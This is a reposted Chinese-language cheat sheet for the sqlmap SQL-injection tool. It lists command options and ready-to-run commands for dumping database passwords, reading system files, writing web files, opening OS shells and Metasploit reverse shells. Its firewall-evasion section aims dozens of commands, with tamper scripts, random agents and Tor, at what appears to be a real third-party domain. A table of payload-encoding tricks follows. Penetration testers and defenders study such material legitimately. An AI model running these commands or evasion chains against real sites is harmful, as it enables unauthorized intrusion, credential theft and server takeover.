1. sqlmap超詳細筆記+思維導圖

本文轉載自查看原文 2018-07-17 22:04 1203 常用工具

sqlmap思維導圖：


基本操作筆記：

-u  #注入點 
-f  #指紋判別數據庫類型 
-b  #獲取數據庫版本信息 
-p  #指定可測試的參數(?page=1&id=2 -p "page,id") 
-D ""  #指定數據庫名 
-T ""  #指定表名 
-C ""  #指定字段 
-s ""  #保存注入過程到一個文件,還可中斷，下次恢復在注入(保存：-s "xx.log"　　恢復:-s "xx.log" --resume) 
--level=(1-5) #要執行的測試水平等級，默認為1 
--risk=(0-3)  #測試執行的風險等級，默認為1 
--time-sec=(2,5) #延遲響應，默認為5 
--data #通過POST發送數據 
--columns        #列出字段 
--current-user   #獲取當前用戶名稱 
--current-db     #獲取當前數據庫名稱 
--users          #列數據庫所有用戶 
--passwords      #數據庫用戶所有密碼 
--privileges     #查看用戶權限(--privileges -U root) 
-U               #指定數據庫用戶 
--dbs            #列出所有數據庫 
--tables -D ""   #列出指定數據庫中的表 
--columns -T "user" -D "mysql"      #列出mysql數據庫中的user表的所有字段 
--dump-all            #列出所有數據庫所有表 
--exclude-sysdbs      #只列出用戶自己新建的數據庫和表 
--dump -T "" -D "" -C ""   #列出指定數據庫的表的字段的數據(--dump -T users -D master -C surname) 
--dump -T "" -D "" --start 2 --top 4  # 列出指定數據庫的表的2-4字段的數據 
--dbms    #指定數據庫(MySQL,Oracle,PostgreSQL,Microsoft SQL Server,Microsoft Access,SQLite,Firebird,Sybase,SAP MaxDB) 
--os      #指定系統(Linux,Windows) 
-v  #詳細的等級(0-6) 
    0：只顯示Python的回溯，錯誤和關鍵消息。 
    1：顯示信息和警告消息。 
    2：顯示調試消息。 
    3：有效載荷注入。 
    4：顯示HTTP請求。 
    5：顯示HTTP響應頭。 
    6：顯示HTTP響應頁面的內容 
--privileges  #查看權限 
--is-dba      #是否是數據庫管理員 
--roles       #枚舉數據庫用戶角色 
--udf-inject  #導入用戶自定義函數（獲取系統權限） 
--union-check  #是否支持union 注入 
--union-cols #union 查詢表記錄 
--union-test #union 語句測試 
--union-use  #采用union 注入 
--union-tech orderby #union配合order by 
--data "" #POST方式提交數據(--data "page=1&id=2") 
--cookie "用;號分開"      #cookie注入(--cookies=”PHPSESSID=mvijocbglq6pi463rlgk1e4v52; security=low”) 
--referer ""     #使用referer欺騙(--referer "http://www.baidu.com") 
--user-agent ""  #自定義user-agent 
--proxy "http://127.0.0.1:8118" #代理注入 
--string=""    #指定關鍵詞,字符串匹配. 
--threads 　　  #采用多線程(--threads 3) 
--sql-shell    #執行指定sql命令 
--sql-query    #執行指定的sql語句(--sql-query "SELECT password FROM mysql.user WHERE user = 'root' LIMIT 0, 1" ) 
--file-read    #讀取指定文件 
--file-write   #寫入本地文件(--file-write /test/test.txt --file-dest /var/www/html/1.txt;將本地的test.txt文件寫入到目標的1.txt) 
--file-dest    #要寫入的文件絕對路徑 
--os-cmd=id    #執行系統命令 
--os-shell     #系統交互shell 
--os-pwn       #反彈shell(--os-pwn --msf-path=/opt/framework/msf3/) 
--msf-path=    #matesploit絕對路徑(--msf-path=/opt/framework/msf3/) 
--os-smbrelay  # 
--os-bof       # 
--reg-read     #讀取win系統注冊表 
--priv-esc     # 
--time-sec=    #延遲設置 默認--time-sec=5 為5秒 
-p "user-agent" --user-agent "sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)"  #指定user-agent注入 
--eta          #盲注 
/pentest/database/sqlmap/txt/
common-columns.txt　　字段字典　　　 
common-outputs.txt 
common-tables.txt      表字典 
keywords.txt 
oracle-default-passwords.txt 
user-agents.txt 
wordlist.txt 

常用語句 :

1./sqlmap.py -u http://www.xxxxx.com/test.php?p=2 -f -b --current-user --current-db --users --passwords --dbs -v 0 
2./sqlmap.py -u http://www.xxxxx.com/test.php?p=2 -b --passwords -U root --union-use -v 2 
3./sqlmap.py -u http://www.xxxxx.com/test.php?p=2 -b --dump -T users -C username -D userdb --start 2 --stop 3 -v 2 
4./sqlmap.py -u http://www.xxxxx.com/test.php?p=2 -b --dump -C "user,pass"  -v 1 --exclude-sysdbs 
5./sqlmap.py -u http://www.xxxxx.com/test.php?p=2 -b --sql-shell -v 2 
6./sqlmap.py -u http://www.xxxxx.com/test.php?p=2 -b --file-read "c:\boot.ini" -v 2 
7./sqlmap.py -u http://www.xxxxx.com/test.php?p=2 -b --file-write /test/test.txt --file-dest /var/www/html/1.txt -v 2 
8./sqlmap.py -u http://www.xxxxx.com/test.php?p=2 -b --os-cmd "id" -v 1 
9./sqlmap.py -u http://www.xxxxx.com/test.php?p=2 -b --os-shell --union-use -v 2 
10./sqlmap.py -u http://www.xxxxx.com/test.php?p=2 -b --os-pwn --msf-path=/opt/framework/msf3 --priv-esc -v 1 
11./sqlmap.py -u http://www.xxxxx.com/test.php?p=2 -b --os-pwn --msf-path=/opt/framework/msf3 -v 1 
12./sqlmap.py -u http://www.xxxxx.com/test.php?p=2 -b --os-bof --msf-path=/opt/framework/msf3 -v 1 
13./sqlmap.py -u http://www.xxxxx.com/test.php?p=2 --reg-add --reg-key="HKEY_LOCAL_NACHINE\SOFEWARE\sqlmap" --reg-value=Test --reg-type=REG_SZ --reg-data=1 
14./sqlmap.py -u http://www.xxxxx.com/test.php?p=2 -b --eta 
15./sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_str_brackets.php?id=1" -p id --prefix "')" --suffix "AND ('abc'='abc"
16./sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/basic/get_int.php?id=1" --auth-type Basic --auth-cred "testuser:testpass"
17./sqlmap.py -l burp.log --scope="(www)?\.target\.(com|net|org)"
18./sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_int.php?id=1" --tamper tamper/between.py,tamper/randomcase.py,tamper/space2comment.py -v 3 
19./sqlmap.py -u "http://192.168.136.131/sqlmap/mssql/get_int.php?id=1" --sql-query "SELECT 'foo'" -v 1 
20./sqlmap.py -u "http://192.168.136.129/mysql/get_int_4.php?id=1" --common-tables -D testdb --banner 
21./sqlmap.py -u "http://192.168.136.129/mysql/get_int_4.php?id=1" --cookie="PHPSESSID=mvijocbglq6pi463rlgk1e4v52; security=low" --string='xx' --dbs --level=3 -p "uid"

簡單的注入流程 :

1.讀取數據庫版本，當前用戶，當前數據庫 
sqlmap -u http://www.xxxxx.com/test.php?p=2 -f -b --current-user --current-db -v 1 
2.判斷當前數據庫用戶權限 
sqlmap -u http://www.xxxxx.com/test.php?p=2 --privileges -U 用戶名 -v 1 
sqlmap -u http://www.xxxxx.com/test.php?p=2 --is-dba -U 用戶名 -v 1 
3.讀取所有數據庫用戶或指定數據庫用戶的密碼 
sqlmap -u http://www.xxxxx.com/test.php?p=2 --users --passwords -v 2 
sqlmap -u http://www.xxxxx.com/test.php?p=2 --passwords -U root -v 2 
4.獲取所有數據庫 
sqlmap -u http://www.xxxxx.com/test.php?p=2 --dbs -v 2 
5.獲取指定數據庫中的所有表 
sqlmap -u http://www.xxxxx.com/test.php?p=2 --tables -D mysql -v 2 
6.獲取指定數據庫名中指定表的字段 
sqlmap -u http://www.xxxxx.com/test.php?p=2 --columns -D mysql -T users -v 2 
7.獲取指定數據庫名中指定表中指定字段的數據 
sqlmap -u http://www.xxxxx.com/test.php?p=2 --dump -D mysql -T users -C "username,password" -s "sqlnmapdb.log" -v 2 
8.file-read讀取web文件 
sqlmap -u http://www.xxxxx.com/test.php?p=2 --file-read "/etc/passwd" -v 2 
9.file-write寫入文件到web 
sqlmap -u http://www.xxxxx.com/test.php?p=2 --file-write /localhost/mm.php --file


使用sqlmap繞過防火牆進行注入測試：

0x00 前言

現在的網絡環境往往是WAF/IPS/IDS保護着Web 服務器等等，這種保護措施往往會過濾擋住我們的SQL注入查詢鏈接，甚至封鎖我們的主機IP，所以這個時候，我們就要考慮怎樣進行繞過，達到注入的目標。因為現在WAF/IPS/IDS都把sqlmap 列入黑名單了，呵呵！但是本文基於sqlmap 進行繞過注入測試，介紹至今仍然實用有效的技巧，以下策略在特定的環境能夠成功繞過，具體是否繞過，請仔細查看輸出的信息。

0x01 確認WAF

首先我們判斷該Web 服務器是否被WAF/IPS/IDS保護着。這點很容易實現，因為我們在漏掃或者使用專門工具來檢測是否有WAF，這個檢測，在nmap 的NSE，或者WVS的策略或者APPSCAN的策略中都有，我們可以利用這些來判斷。在此我們，也介紹使用sqlmap 進行檢測是否有WAF/IPS/IDS

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --thread 10 --identify-waf#首選

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --thread 10 --check-waf#備選

0x02 使用參數進行繞過

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --random-agent -v 2 #使用任意瀏覽器進行繞過，尤其是在WAF配置不當的時候

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --hpp -v 3#使用HTTP 參數污染進行繞過，尤其是在ASP.NET/IIS 平台上

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --delay=3.5 --time-sec=60 #使用長的延時來避免觸發WAF的機制，這方式比較耗時

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --proxy=211.211.211.211:8080 --proxy-cred=211:985#使用代理進行注入

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --ignore-proxy#禁止使用系統的代理，直接連接進行注入

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --flush-session#清空會話，重構注入

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --hex#或者使用參數 --no-cast ，進行字符碼轉換

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --mobile #對移動端的服務器進行注入

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --tor # 匿名注入

0x03 使用腳本介紹

1 使用格式：

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --tamper=A.py,B.py#腳本A，腳本B

2 腳本總類

01 apostrophemask.py#用utf8代替引號；Example: ("1 AND '1'='1") '1 AND %EF%BC%871%EF%BC%87=%EF%BC%871'

02 equaltolike.py#MSSQL * SQLite中like 代替等號；Example: Input: SELECT * FROM users WHERE id=1 ；Output: SELECT * FROM users WHERE id LIKE 1

03 greatest.py#MySQL中繞過過濾’>’ ,用GREATEST替換大於號；Example: ('1 AND A > B') '1 AND GREATEST(A,B+1)=A'

04 space2hash.py#空格替換為#號隨機字符串以及換行符；Input: 1 AND 9227=9227；Output: 1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227

05 apostrophenullencode.py#MySQL 4, 5.0 and 5.5，Oracle 10g，PostgreSQL繞過過濾雙引號，替換字符和雙引號；

06 halfversionedmorekeywords.py#當數據庫為mysql時繞過防火牆，每個關鍵字之前添加mysql版本評論；

07 space2morehash.py#MySQL中空格替換為 #號以及更多隨機字符串換行符；

08 appendnullbyte.py#Microsoft Access在有效負荷結束位置加載零字節字符編碼；Example: ('1 AND 1=1') '1 AND 1=1%00'

09 ifnull2ifisnull.py#MySQL，SQLite (possibly)，SAP MaxDB繞過對 IFNULL 過濾。替換類似’IFNULL(A, B)’為’IF(ISNULL(A), B, A)’

10 space2mssqlblank.py(mssql)#mssql空格替換為其它空符號

11base64encode.py#用base64編碼j Example: ("1' AND SLEEP(5)#") 'MScgQU5EIFNMRUVQKDUpIw==' Requirement: all

12 space2mssqlhash.py#mssql查詢中替換空格

13 modsecurityversioned.py#(mysql中過濾空格，包含完整的查詢版本注釋;Example: ('1 AND 2>1--') '1 /*!30874AND 2>1*/--'

14 space2mysqlblank.py#(mysql中空格替換其它空白符號

15 between.py#MS SQL 2005，MySQL 4, 5.0 and 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0中用between替換大於號（>）

16 space2mysqldash.py#MySQL，MSSQL替換空格字符（”）（’ – ‘）后跟一個破折號注釋一個新行（’ n’）

17 multiplespaces.py#圍繞SQL關鍵字添加多個空格；Example: ('1 UNION SELECT foobar') '1 UNION SELECT foobar'

18 space2plus.py#用+替換空格；Example: ('SELECT id FROM users') 'SELECT+id+FROM+users'

19 bluecoat.py#MySQL 5.1, SGOS代替空格字符后與一個有效的隨機空白字符的SQL語句。然后替換=為like

20 nonrecursivereplacement.py#雙重查詢語句。取代predefined SQL關鍵字with表示 suitable for替代（例如 .replace（“SELECT”、””)） filters

21 space2randomblank.py#代替空格字符（“”）從一個隨機的空白字符可選字符的有效集

22 sp_password.py#追加sp_password’從DBMS日志的自動模糊處理的26 有效載荷的末尾

23 chardoubleencode.py#雙url編碼(不處理以編碼的)

24 unionalltounion.py#替換UNION ALL SELECT UNION SELECT；Example: ('-1 UNION ALL SELECT') '-1 UNION SELECT'

25 charencode.py#Microsoft SQL Server 2005，MySQL 4, 5.0 and 5.5，Oracle 10g，PostgreSQL 8.3, 8.4, 9.0url編碼；

26 randomcase.py#Microsoft SQL Server 2005，MySQL 4, 5.0 and 5.5，Oracle 10g，PostgreSQL 8.3, 8.4, 9.0中隨機大小寫

27 unmagicquotes.py#寬字符繞過 GPC addslashes；Example: * Input: 1′ AND 1=1 * Output: 1%bf%27 AND 1=1–%20

28 randomcomments.py#用/**/分割sql關鍵字；Example:‘INSERT’ becomes ‘IN//S//ERT’

29 charunicodeencode.py#ASP，ASP.NET中字符串 unicode 編碼；

30 securesphere.py#追加特制的字符串；Example: ('1 AND 1=1') "1 AND 1=1 and '0having'='0having'"

31 versionedmorekeywords.py#MySQL >= 5.1.13注釋繞過

32 space2comment.py#Replaces space character (‘ ‘) with comments ‘/**/’

33 halfversionedmorekeywords.py#MySQL < 5.1中關鍵字前加注釋

0x04 腳本參數組合策略繞過

1 mysql繞過：

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --random-agent -v 2 -delay=3.5 --tamper=space2hash.py,modsecurityversioned.py

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --random-agent --hpp --tamper=space2mysqldash.p,versionedmorekeywords.py

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" -delay=3.5 ----user-agent=" Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/38.0.696.12 Safari/534.24” --tamper=apostrophemask.py,equaltolike.py

備注：這些組合策略可以根據注入的反饋信息，及時調整組合策略

2 MSSQL：

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --delay=3.5 --hpp --tamper=space2comment.py,randomcase.py
root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --delay=3.5 --time-sec=120 --tamper=space2mssqlblank.py,securesphere.py

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --delay=3.5 --tamper=unionalltounion.py,base64encode.p

3 ms access:

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --delay=3.5 --random-agent --tamper=appendnullbyte.py,space2plus.py

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --delay=3.5 --random-agent --hpp --tamper=chardoubleencode.py

4 Oracle：

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --delay=5 --random-agent --hpp --tamper=unmagicquotes.py,unionalltounion.py

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --delay=5--user-agent =“Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0” --hpp --tamper=charunicodeencode.py,chardoubleencode.py

5 建議：

因為WAF可能采用白名單規則，所以對於選擇哪種策略，重點是根據-v 3 提示的信息進行判斷，可以抓取主流的瀏覽器的user-agent ,s適當的延時，加上注入字符轉換---大小寫、空格、字符串、注釋、加密等等方式


常用tamper腳本：

支持的數據庫	編號	腳本名稱	作用	實現方式
all	1	apostrophemask.py	用utf8代替引號	("1 AND '1'='1") '1 AND %EF%BC%871%EF%BC%87=%EF%BC%871'
	2	base64encode.py	用base64編碼替換	("1' AND SLEEP(5)#") 'MScgQU5EIFNMRUVQKDUpIw=='
	3	multiplespaces.py	圍繞SQL關鍵字添加多個空格	('1 UNION SELECT foobar') '1 UNION SELECT foobar'
	4	space2plus.py	用+替換空格	('SELECT id FROM users') 'SELECT+id+FROM+users'
	5	nonrecursivereplacement.py	雙重查詢語句。取代predefined SQL關鍵字with表示 suitable for替代（例如 .replace（“SELECT”、”")） filters	('1 UNION SELECT 2--') '1 UNIOUNIONN SELESELECTCT 2--'
	6	space2randomblank.py	代替空格字符（“”）從一個隨機的空白字符可選字符的有效集	('SELECT id FROM users') 'SELECT%0Did%0DFROM%0Ausers'
	7	unionalltounion.py	替換UNION ALL SELECT UNION SELECT	('-1 UNION ALL SELECT') '-1 UNION SELECT'
	8	securesphere.py	追加特制的字符串	('1 AND 1=1') "1 AND 1=1 and '0having'='0having'"
mssql	1	space2hash.py	繞過過濾‘=’ 替換空格字符（”），（’ – ‘）后跟一個破折號注釋，一個隨機字符串和一個新行（’ n’）	'1 AND 9227=9227' '1--nVNaVoPYeva%0AAND--ngNvzqu%0A9227=9227'
	2	equaltolike.py	like 代替等號	* Input: SELECT * FROM users WHERE id=1 2 * Output: SELECT * FROM users WHERE id LIKE 1
	3	space2mssqlblank.py(mssql)	空格替換為其它空符號	Input: SELECT id FROM users Output: SELECT%08id%02FROM%0Fusers
	4	space2mssqlhash.py	替換空格	('1 AND 9227=9227') '1%23%0AAND%23%0A9227=9227'
	5	between.py	用between替換大於號（>）	('1 AND A > B--') '1 AND A NOT BETWEEN 0 AND B--'
	6	percentage.py	asp允許每個字符前面添加一個%號	* Input: SELECT FIELD FROM TABLE * Output: %S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E
	7	sp_password.py	追加sp_password’從DBMS日志的自動模糊處理的有效載荷的末尾	('1 AND 9227=9227-- ') '1 AND 9227=9227-- sp_password'
	8	charencode.py	url編碼	* Input: SELECT FIELD FROM%20TABLE * Output: %53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45
	9	randomcase.py	隨機大小寫	* Input: INSERT * Output: InsERt
	10	charunicodeencode.py	字符串 unicode 編碼	* Input: SELECT FIELD%20FROM TABLE * Output: %u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045′
	11	space2comment.py	Replaces space character (‘ ‘) with comments ‘/**/’	* Input: SELECT id FROM users * Output: SELECT//id//FROM/**/users
mysql >= 5.1.13	1	equaltolike.py	like 代替等號	* Input: SELECT * FROM users WHERE id=1 2 * Output: SELECT * FROM users WHERE id LIKE 1
	2	greatest.py	繞過過濾’>’ ,用GREATEST替換大於號。	('1 AND A > B') '1 AND GREATEST(A,B+1)=A'
	3	apostrophenullencode.py	繞過過濾雙引號，替換字符和雙引號。	tamper("1 AND '1'='1") '1 AND %00%271%00%27=%00%271'
	4	ifnull2ifisnull.py	繞過對 IFNULL 過濾。替換類似’IFNULL(A, B)’為’IF(ISNULL(A), B, A)’	('IFNULL(1, 2)') 'IF(ISNULL(1),2,1)'
	5	space2mssqlhash.py	替換空格	('1 AND 9227=9227') '1%23%0AAND%23%0A9227=9227'
	6	modsecurityversioned.py	過濾空格，包含完整的查詢版本注釋	('1 AND 2>1--') '1 /!30874AND 2>1/--'
	7	space2mysqlblank.py	空格替換其它空白符號(mysql)	Input: SELECT id FROM users Output: SELECT%0Bid%0BFROM%A0users
	8	between.py	用between替換大於號（>）	('1 AND A > B--') '1 AND A NOT BETWEEN 0 AND B--'
	9	modsecurityzeroversioned.py	包含了完整的查詢與零版本注釋	('1 AND 2>1--') '1 /!00000AND 2>1/--'
	10	space2mysqldash.py	替換空格字符（”）（’ – ‘）后跟一個破折號注釋一個新行（’ n’）	('1 AND 9227=9227') '1--%0AAND--%0A9227=9227'
	11	bluecoat.py	代替空格字符后與一個有效的隨機空白字符的SQL語句。然后替換=為like	('SELECT id FROM users where id = 1') 'SELECT%09id FROM users where id LIKE 1'
	12	percentage.py	asp允許每個字符前面添加一個%號	* Input: SELECT FIELD FROM TABLE * Output: %S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E
	13	charencode.py	url編碼	* Input: SELECT FIELD FROM%20TABLE * Output: %53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45
	14	randomcase.py	隨機大小寫	* Input: INSERT * Output: InsERt
	15	versionedkeywords.py	Encloses each non-function keyword with versioned MySQL comment	* Input: 1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,100,114,117,58))# * Output: 1/!UNION!ALL!SELECT!NULL/,/!NULL/, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER()/!AS!CHAR/),CHAR(32)),CHAR(58,100,114,117,58))#
	16	space2comment.py	Replaces space character (‘ ‘) with comments ‘/**/’	* Input: SELECT id FROM users * Output: SELECT//id//FROM/**/users
	17	charunicodeencode.py	字符串 unicode 編碼	* Input: SELECT FIELD%20FROM TABLE * Output: %u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045′
	18	versionedmorekeywords.py	注釋繞過	* Input: 1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,122,114,115,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,115,114,121,58))# * Output: 1/!UNION!ALL!SELECT!NULL/,/!NULL/,/!CONCAT/(/!CHAR/(58,122,114,115,58),/!IFNULL/(CAST(/!CURRENT_USER/()/!AS!CHAR/),/!CHAR/(32)),/!CHAR/(58,115,114,121,58))#
MySQL < 5.1	19	halfversionedmorekeywords.py	關鍵字前加注釋	* Input: value’ UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND ‘QDWa’='QDWa * Output: value’/!0UNION/!0ALL/!0SELECT/!0CONCAT(/!0CHAR(58,107,112,113,58),/!0IFNULL(CAST(/!0CURRENT_USER()/!0AS/!0CHAR),/!0CHAR(32)),/!0CHAR(58,97,110,121,58)), NULL, NULL#/!0AND ‘QDWa’='QDWa
MySQL < 5.1	20	halfversionedmorekeywords.py	當數據庫為mysql時繞過防火牆，每個關鍵字之前添加 mysql版本評論	1.("value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa") 2."value'/!0UNION/!0ALL/!0SELECT/!0CONCAT(/!0CHAR(58,107,112,113,58),/!0IFNULL(CAST(/!0CURRENT_USER()/!0AS/!0CHAR),/!0CHAR(32)),/!0CHAR(58,97,110,121,58)),/!0NULL,/!0NULL#/!0AND 'QDWa'='QDWa"
MySQL >= 5.1.13	21	space2morehash.py	空格替換為 #號以及更多隨機字符串換行符	* Input: 1 AND 9227=9227 * Output: 1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227
Oracle	1	greatest.py	繞過過濾’>’ ,用GREATEST替換大於號。	('1 AND A > B') '1 AND GREATEST(A,B+1)=A'
	2	apostrophenullencode.py	繞過過濾雙引號，替換字符和雙引號。	tamper("1 AND '1'='1") '1 AND %00%271%00%27=%00%271'
	3	between.py	用between替換大於號（>）	('1 AND A > B--') '1 AND A NOT BETWEEN 0 AND B--'
	4	charencode.py	url編碼	* Input: SELECT FIELD FROM%20TABLE * Output: %53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45
	5	randomcase.py	隨機大小寫	* Input: INSERT * Output: InsERt
	6	charunicodeencode.py	字符串 unicode 編碼	* Input: SELECT FIELD%20FROM TABLE * Output: %u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045′
	7	space2comment.py	Replaces space character (‘ ‘) with comments ‘/**/’	* Input: SELECT id FROM users * Output: SELECT//id//FROM/**/users
PostgreSQL	1	greatest.py	繞過過濾’>’ ,用GREATEST替換大於號。	('1 AND A > B') '1 AND GREATEST(A,B+1)=A'
	2	apostrophenullencode.py	繞過過濾雙引號，替換字符和雙引號。	tamper("1 AND '1'='1") '1 AND %00%271%00%27=%00%271'
	3	between.py	用between替換大於號（>）	('1 AND A > B--') '1 AND A NOT BETWEEN 0 AND B--'
	4	percentage.py	asp允許每個字符前面添加一個%號	* Input: SELECT FIELD FROM TABLE * Output: %S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E
	5	charencode.py	url編碼	* Input: SELECT FIELD FROM%20TABLE * Output: %53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45
	6	randomcase.py	隨機大小寫	* Input: INSERT * Output: InsERt
	7	charunicodeencode.py	字符串 unicode 編碼	* Input: SELECT FIELD%20FROM TABLE * Output: %u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045′
	8	space2comment.py	Replaces space character (‘ ‘) with comments ‘/**/’	* Input: SELECT id FROM users * Output: SELECT//id//FROM/**/users
Access	1	appendnullbyte.py	在有效負荷結束位置加載零字節字符編碼	('1 AND 1=1') '1 AND 1=1%00'
其他		chardoubleencode.py	雙url編碼(不處理以編碼的)	* Input: SELECT FIELD FROM%20TABLE * Output: %2553%2545%254c%2545%2543%2554%2520%2546%2549%2545%254c%2544%2520%2546%2552%254f%254d%2520%2554%2541%2542%254c%2545
		unmagicquotes.py	寬字符繞過 GPC addslashes	* Input: 1′ AND 1=1 * Output: 1%bf%27 AND 1=1–%20
		randomcomments.py	用/**/分割sql關鍵字	‘INSERT’ becomes ‘IN//S//ERT’

免責聲明！

本站轉載的文章為個人學習借鑒使用，本站對版權不負任何法律責任。如果侵犯了您的隱私權益，請聯系本站郵箱yoyou2525@163.com刪除。

猜您在找 高等數學思維導圖——1.函數與極限詳細的數據結構思維導圖【算法】思維導圖 SpringBoot（思維導圖） Echarts思維導圖《HTML重構》讀書筆記&思維導圖深入理解JVM讀書筆記思維導圖編譯原理的思維導圖 Python學習思維導圖導數的應用思維導圖